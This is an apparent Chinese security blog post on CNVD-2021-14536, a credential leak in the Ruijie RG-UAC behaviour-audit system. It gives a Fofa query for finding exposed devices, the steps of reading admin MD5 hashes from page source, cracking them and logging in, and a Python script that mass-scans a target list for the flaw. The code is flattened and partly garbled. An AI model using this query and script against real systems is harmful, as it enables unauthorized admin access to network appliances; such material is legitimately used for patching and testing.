锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞
漏洞描述
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台
编号:CNVD-2021-14536
Fofa指纹
1
title="RG-UAC登录页面" && body="admin"
漏洞利用
源代码搜索:
MD5解密:
登录成功
自动化 POC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
import requestsimport sysimport randomimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarningdef title (): print('+------------------------------------------' ) print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m' ) print('+ 33[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统 33[0m' ) print('+ 33[36m使用格式: python3 poc.py 33[0m' ) print('+ 33[36mFile >>> ip.txt 33[0m' ) print('+------------------------------------------' ) def POC_1 (targ et_url ): vuln_url = targ et_url headers = { "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" , } try : requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.get(url=vuln_url, headers=headers, verify=False , timeout=5 ) if "super_admin" in response.text and "password" in response.text and response.status_code == 200 : print("33[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 33[0m" .format(target_url)) else : print("33[31m[x] 目标 {}不存在漏洞 33[0m" .format(target_url)) except Exception as e: print("33[31m[x] 目标 {}不存在漏洞 33[0m" .format(target_url)) def Scan (file_name ): with open(file_name, "r" , encoding='utf8' ) as scan_url: for url in scan_url: if url[:4 ] != "http" : url = "http://" + url url = url.strip('n' ) try : POC_1(url) except Exception as e: print("33[31m[x] 请求报错 33[0m" .format(e)) continue if __name__ == '__main__' : title() file_name = str(input("33[35mPlease input Attack FilenFile >>> 33[0m" )) Scan(file_name)
FROM : lintstar.top , Author: 离沫凌天๓
相关推荐: CVE-2021-1675远程RCE复现
前言 为了复现前几天爆出的CVE-2021-1675远程RCE,我的周末过得很充实,谨以此篇记录那个永远都回不来的周末。 测试环境 DC:Windows Server 2019 192.168.110.110 PC:Windows 10 192.168.110…
评论